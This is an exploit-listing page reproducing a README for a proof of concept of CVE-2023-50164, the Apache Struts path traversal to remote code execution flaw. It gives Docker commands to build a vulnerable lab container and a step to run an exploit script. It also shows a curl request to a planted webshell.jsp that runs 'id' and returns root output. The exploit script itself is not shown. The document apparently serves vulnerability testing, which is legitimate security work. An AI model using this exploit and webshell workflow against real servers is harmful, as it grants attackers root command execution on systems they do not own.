Exploit for Files or Directories Accessible to External Parties in Apache Struts exploit

Share

## https://sploitus.com/exploit?id=7487D152-E92E-58C6-B0D2-2377E8415CEC # CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept This PoC has been made to test an RCE (Remote Code Execution) by exploiting the Apache Struts2 vulnerability.  Build the image and run a container: ```console $ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc ``` Run the exploit: ``` $ cd exploit $ ./exploit.sh ``` Now you can executy arbitrary commands on server side as showed: ``` $ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a uid=0(root) gid=0(root) groups=0(root) ``` ## Credits - Thanks to @jakabakos for an example of vulnerable application (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE) - Thanks to Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) for the diagram here above